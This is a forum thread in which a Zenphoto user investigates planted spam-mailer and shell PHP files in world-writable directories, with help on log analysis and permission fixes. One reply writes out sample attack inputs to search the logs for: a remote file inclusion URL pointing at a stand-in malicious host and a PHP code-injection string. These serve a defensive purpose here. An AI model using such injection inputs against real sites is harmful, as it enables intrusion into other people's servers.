My zenphoto got hacked?

fuzzi

Hi,

i just found that two of my three zenphoto-installs got hacked on the 1st of August!
One is with Version 1.1.5 and the other one with 1.1.6.

There is a file called "mailerok.php" in the /albums/-directory of zenphoto which are scripts for email-spamming purposes.

Does anybody else also got the same problem? Is this a zenphoto problem or a problem with the directory-access?

fuzzi

just saw that there is a second file called EngShell99.php which is a little more evil it seems

trisweb

Are you on a shared server? It's possible that someone else copied that file to your account due to the /albums directory having loose permissions for uploading.

If the files are still around, what user/group owns them and what are their permissions? You should be able to see this in your FTP program, or in SSH if you have access.

It is very very unlikely that Zenphoto would ever allow writing a PHP file to the albums directory. As far as I know, it only writes images, filters for images, and edits images. But, maybe the rest of the team has insights, as I haven't reviewed every line of code since 1.1 was released.

If you're on a shared server I would bet it's the directory permissions and someone just taking advantage of that; I would contact your host, especially if you see a user or group that the file belongs to.

sbillard

Only admins can upload anything. Even then the file extensions are checked for being image files. (I don't know if zip file contents are checked--not familiar with that code.)

But at any rate, someone would have to have admin upload priviledges first.

williamz

I'm not heavily into network security anymore but could it be possible that zenphoto may be vulnerable to PHP or Sql code injections?

If the files are owned by your username and group then it could be possible that someone has your username/password or there is a breach in zenphoto somewhere.

Can you check your web logs for any attempts? Check both the access and error logs. Error logs are usually very clear because they usually are logged if it doesn't fit but there may be a lot of false positives on those as well.

First try seeing if anyone is accessing those two rogue files. Then look for any consistency, i.e. if it always comes from the same IP. Then scan the logs as far as you can go back to see if there's any other attempts from that IP or range.

Second try looking for funny injection urls. Usually they try more than one time until they figured out what works. Usually they look like www.yoursite.com/index.php?album=
http://evilhackingsite.com or www.yoursite.com/index.php?album=';echo "fjskdjs";&

Let us know how you make out because it'll be nice to get to the bottom of this. I'm not sure of your familiarity with unix accounts but there are a couple of commands that you can use like last that will let you know your telnet/ssh/ftp connection attempts or maybe your ISP has some sort of other logging.

fuzzi

Thanks for your answers! I checked my logs - these are the results:

Absolutely nothing about the files mailerok.php and EngShell99.php on my ftp-logs. So i conclude the files have been written by some script or the logs were modified afterwards?

The http-access-logs show 2 ips, one is 125.164.252.196 and the second 125.164.250.53. Both ips are the only ones which access these files - and the ips are the same at different days - maybe he has a static ip.

I can post the logs here if you want to - its not that much, maybe 80 lines or so.

fuzzi

The last two lines before he accessed the mailerok.php are:

125.164.252.196 - - [01/Aug/2008:11:00:55 +0200] "GET /albums/ HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
125.164.252.196 - - [01/Aug/2008:11:01:21 +0200] "GET /albums/ HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702

Before these lines he just looked at some pictures but nothing suspicious in the urls.

I found this issue - is this fixed in 1.1.5 and 1.1.6?

http://en.securitylab.ru/poc/311064.php

acrylian

Yes, that issue should be fixed, but you also should consider to upgrade to 1.1.7 (or wait for the soon to come 1.2).

williamz

That's a good start.

Those IPs are originating from one of the main ISPs in Indonesia. So most likely the IPs will be dynamic and changing all the time. If I were you I'd check the entire logs for partial matches to the IPs 125.164.x.x. (or all the logs if it's not too large and go back a couple days prior so we can figure out where the entry point was). You can use Excel's Text to Columns function to split the raw log files into more manageable columns where you can sort and eliminate.

It's possible to bait him by removing the two files and seeing if he will attempt to exploit whatever hole he used before.

fuzzi

Thanks for your help.

I saw that he only accesses folders with chmod 777 - like the /albums and /cache folder. I tried around a little and with 645 zenphoto also works.

At the time he didnt attempt to write the files again, im just downloading all files, clean them if i find anything suspicious and do a synchronize every day. so i can watch all folders if there are new files.

fuzzi

hi,

i just called my provider, who seems to be quite confident that its not his problem because otherwise he would know it already (?). I dont know how serious he is about viruses because even my desktop-anti-virus detects one of the php-files as an trojan.

Anyway - my hosting-provider said that the problem is the chmod 777 of the directories /album and /cache - is this true? And how can i get rid of the 777s?

Thanks a lot!

sbillard

There is a define at the beginning of functions.php and setup.php `define('CHMOD_VALUE', 0777);` which you can change. But for the existing files/folders you will have to use FTP to change the access rights.